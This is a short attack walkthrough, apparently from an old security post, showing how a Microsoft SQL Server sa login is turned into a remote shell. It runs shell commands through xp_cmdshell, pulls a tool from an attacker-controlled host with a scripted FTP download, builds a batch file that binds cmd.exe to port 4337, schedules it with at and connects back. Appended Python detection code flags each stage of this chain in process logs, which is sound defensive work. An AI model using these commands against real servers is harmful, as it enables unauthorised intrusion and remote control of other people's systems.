{SQL template}:
osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"
Shell execution through the template:
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"
Pull data back to SQL:
c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe
Or be obvious:
net user add
On the semi-evil box host (serving TFTP or FTP):
sbdbg.exe
{SQL template} set up FTP command script:
ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp
{SQL template} Execute FTP script:
FTP -s:script.ftp -A semi.evil.host.ip
{SQL template} set up reverse shell:
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat
{SQL template} get time on server:
Don't forget ICMP timestamp requests instead.
time
{SQL template} schedule execution of the bat file:
at \\sql.vuln.box\ 04:20 evil.bat
Connect from any.evil.ip:
sbd sql.vuln.box 4337
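As an added, defender-side example (not code from the original post), the following Python flags the stages of the chain above in process-creation logs: the SQL service spawning cmd.exe, a scripted ftp/tftp pull, a listener handing out cmd.exe, and an at.exe job running a .bat file. The "Parent|Image|CommandLine" log layout and the sample events are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events in a "Parent|Image|CommandLine"
# shape (a Sysmon/EDR-style layout assumed for this example, not from the page).
SAMPLE_EVENTS = [
    "sqlservr.exe|cmd.exe|cmd.exe /c echo GET sbdbg > script.ftp",
    "sqlservr.exe|cmd.exe|cmd.exe /c FTP -s:script.ftp -A 198.51.100.7",
    "sqlservr.exe|cmd.exe|cmd.exe /c echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat",
    "sqlservr.exe|cmd.exe|cmd.exe /c at \\\\sql.vuln.box\\ 04:20 evil.bat",
    "explorer.exe|ftp.exe|ftp.exe ftp.example.org",     # benign interactive ftp
    "services.exe|svchost.exe|svchost.exe -k netsvcs",  # benign service host
]

# One rule per stage of the chain: the SQL service spawning a shell (xp_cmdshell),
# a scripted ftp/tftp pull, a listener that serves cmd.exe, and an at.exe job
# that runs a .bat file. Each pattern is matched against the whole event line.
STAGE_RULES = {
    "xp_cmdshell_child": re.compile(r"^sqlservr\.exe\|cmd\.exe\|", re.I),
    "scripted_ftp_pull": re.compile(r"\bt?ftp(\.exe)?\b.*\s-s:", re.I),
    "bind_shell_listener": re.compile(r"-l\s+-p\s+\d+\s+-e\s+cmd\.exe", re.I),
    "at_scheduled_bat": re.compile(
        r"\bat(\.exe)?\s+(\\\\\S+\s+)?\d{1,2}:\d{2}\s+\S+\.bat", re.I),
}


def match_stages(events):
    """Return {stage_name: [matching events]} for every rule that fires."""
    hits = defaultdict(list)
    for event in events:
        for stage, pattern in STAGE_RULES.items():
            if pattern.search(event):
                hits[stage].append(event)
    return dict(hits)


def chain_detected(events, min_stages=3):
    """Flag the host when at least `min_stages` distinct stages are present.

    A single stage (one xp_cmdshell child, say) can be legitimate admin use;
    several stages together are the signature of the chain described above.
    """
    stages = sorted(match_stages(events))
    return len(stages) >= min_stages, stages


if __name__ == "__main__":
    flagged, stages = chain_detected(SAMPLE_EVENTS)
    print("chain detected:", flagged, "stages:", stages)
```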